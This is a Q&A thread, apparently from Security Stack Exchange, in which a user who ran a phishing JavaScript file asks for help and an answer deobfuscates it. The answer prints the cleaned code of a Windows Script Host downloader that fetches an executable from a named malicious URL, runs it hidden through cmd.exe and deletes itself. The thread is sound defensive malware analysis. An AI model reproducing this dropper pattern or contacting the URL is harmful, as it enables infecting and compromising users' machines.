# I'm an idiot. Need help with JavaScript "codebreaking" and analysis

Tags: malware, javascript, obfuscation

I accidentally executed a .js file from a phishing source with Windows Script Host. If possible I really don't want to reformat. If anyone could analyse this file it'd be awesome.

I'm running Windows 7, 64bit.

You can find the JS file in [github](https://github.com/volaix/TheScam/tree/master). It's around 50,000 chars. A lot of it are dummy functions.

Here are [Virus scanner results](https://www.virustotal.com/en/file/9250b704775cd9dc2756f6cd17eddc1759e1580d16f8cc490c28b2bdefd613ba/analysis/1487143532/).

Edit: Not a duplicate because the intent of the virus is different to others. Same obfuscation idea, different content.

Comment: It seems to be one of the ActiveX malware downloaders currently circulating. Although the obfuscation method is different it seems to be a similar script as [this](https://security.stackexchange.com/questions/147714/de-obfuscation-of-malicious-javascript-in-spoofed-email) or [this](https://security.stackexchange.com/questions/148497/how-to-deobfuscate-suspicious-javascript-code) one.

Comment: Was [this](https://www.hybrid-analysis.com/sample/68445e52ab786727a7742790438acde1104b45084b84a05235dd6adaff6e722e?environmentId=100) you?

Comment: @Jedi Nope. That wasn't me. But thanks for asking! Looks like someone else has been getting it.

Comment: @Arminius Yeah I did note that too! Thanks for pointing it out!

Comment: I've put it through this scanner and have found the specific trojan I think. https://www.virustotal.com/en/file/9250b704775cd9dc2756f6cd17eddc1759e1580d16f8cc490c28b2bdefd613ba/analysis/1487143532/
I've installed Emsisoft, one of the virus scanners that detects it from the results, and have searched. It comes up clean.

Answer (score 3, accepted):

## How to deobfuscate

### All the functions

All the strangely named functions just returns whatever is passed into them. So code like `xmudzymza(["an"][0])` is actually just a convoluted way of writing `"an"`. If you copy paste the code into an editor with syntax highlighting you can read large parts of the deobfuscated code by just ignoring everything that isn't highlighted as string literals!

### Creating and testing ActiveXObject

Among all the functions you have a not so well hidden `ActiveXObject`:

```
uzuqevr = ActiveXObject;
```

Right before the if clause it pops up again:

```
var agwibak = new uzuqevr(obrujaw(["Sc"][0]) + ... + qowokl(["ct"][0]);
var ctaqev = new['ukehkyk', Function, 'lebate'][1](repu(["va"][0]) + ... + nwavale([";"][0]));
```

If you run just the long string concatenation inside the parantesis in the console, you get the string `Scripting.FileSystemObject`. So what we have is actually this:

```
var agwibak = new ActiveXObject("Scripting.FileSystemObject");
```

On the line after that we have this:

```
var ctaqev = new['ukehkyk', Function, 'lebate'][1](repu(["va"][0]) + ... + nwavale([";"][0]));
```

It creates a new of the first element in the vector - that is `Function`. The [function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) creates a function from a string of code, sort of like eval. The function is assigned to `ctagev`. Just like above we can evaluate the long string concatenation in the console (without actually running it). This is the function:

```
(function() {
    var ggelkigtu = agwibak.GetDrive(agwibak.GetDriveName('C:\oeokiotifgjvdkslsdfsdghrefvdfbdhgdgdfgd\dsgdgdfgdfgdf\354353535345\sdfsfsdfsdfdsf')).SerialNumber; if(ggelkigtu < 0 || ggelkigtu > 0) return true; else return false;
})
```

That function is then called in the if clause:

```
if (ctaqev()) { ... }
```

So what does it do? It tries to create an ActiveXObject and assign it to `ggelkigtu`. It then returns a boolean based on `ggelkigtu < 0 || ggelkigtu > 0`. If the JS interpreter does not support ActiveX `ggelkigtu` will be `undefined`, and that condition will be `false`. So if your interpreter does not support ActiveX the content of the if clause will be ignored.

### Inside the if clause

To obfuscate this part you need to do two things:

1. Change the names of the ridiculusly long variable names (by just doing search and replace).
2. Again, remove the `xxxxxx(["ab"][0])` to get the actual strings.

What you get is this:

```
if (ctaqev()) {
    long1 = this["WScript"];
    long2 = long1["CreateObject"]("Scripting.FileSystemObject");
    long3 = long1["CreateObject"]("WScript.Shell");
    long4 = long1["CreateObject"]("L2TP");
    long5 = long1["CreateObject"]("ADODB.Stream");
    long6 = long2["GetSpecialFolder"]("2");
    long7 = long2["GetTempName"]();
    long8 = long4["open"]("T", "http://moosetraxtax.com/images/total.exe", "0");
    long8 = long4["send"]();
    long5["type"] = ["1"];
    long9 = long4["ResponseBody"];
    long10 = long1["ScriptFullName"];
    long8 = long5["Open"]();
    long8 = long5["Write"](long9);
    long8 = long5["SaveToFile"](long6 + long7);
    long8 = long5["Close"]();
    long8 = long3["run"]("cmd.exe /c " + long6 + long7, "0");
    long8 = long2["deleteFile"](long10);

}
long1["echo"]("The file is corrupt and cannot be opened");
```

Cleaning it up some more (by using `.` instead of `[""]` and changing the variable names again) we get this:

```
if(ctaqev()) {
    fileSystem = WScript.CreateObject("Scripting.FileSystemObject");
    shell = WScript.CreateObject("WScript.Shell");
    l2tp = WScript.CreateObject("L2TP");
    stream = WScript.CreateObject("ADODB.Stream");
    folder = fileSystem.GetSpecialFoldder("2");
    tempName = fileSystem.GetTempName();
    x = l2tp.open("T", "http://moosetraxtax.com/images/total.exe", "0");
    x = l2tp.send();
    stream.type = "1";
    response = l2tp.ResponseBody;
    scriptName = WScript.ScriptFullName;
    x = stream.Open()
    x = stream.Write(response);
    x = stream.SaveToFile(folder + tempName);
    x = stream.Close();
    x = shell.run("cmd.exe /c " + folder + tempName, "0");
    x = fileSystem.deleteFile(scriptName);
}
WScript.echo("The file is corrupt and cannot be opened");
```

## What does it do? Are you infected?

I dont know much about ActiveX, but it sure looks like it downloads a file from `http://moosetraxtax.com/images/total.exe` and runs it. Surprisingly, only three AV vendors identify that URL as malware on [Virus Total](https://virustotal.com/sv/url/64434052f5b4e954fa19e033c84a48218f60b29d94582f8994f72c97402941da/analysis/), but I think we can be pretty sure it is.

If you want to know what you got, you can try to download it from there and investigate. Obviously that is a risky activity, and there is no guarantee you will get the same thing.

Running this script in a modern browser would be safe, because they do not support ActiveX. But you ran it with Windows Script Host. I don't know what if any limitations a script executed by WSH has, but to be on the safe side I would assume that the computer is infected and [treat it as such](https://security.stackexchange.com/questions/138606/help-my-home-pc-has-been-infected-by-a-virus-what-do-i-do-now).

If you want to make sure you really were infected, I would recommend the following:

- Find out what WSH really allows a script to do. (I don't know the answer to that, sorry.)
- Check the logs for your firewall (if you have one) to see if the request was blocked.

Comment: I believe Windows executes such scripts without any sandboxing as it assumes those stand-alone files are just like .exe files.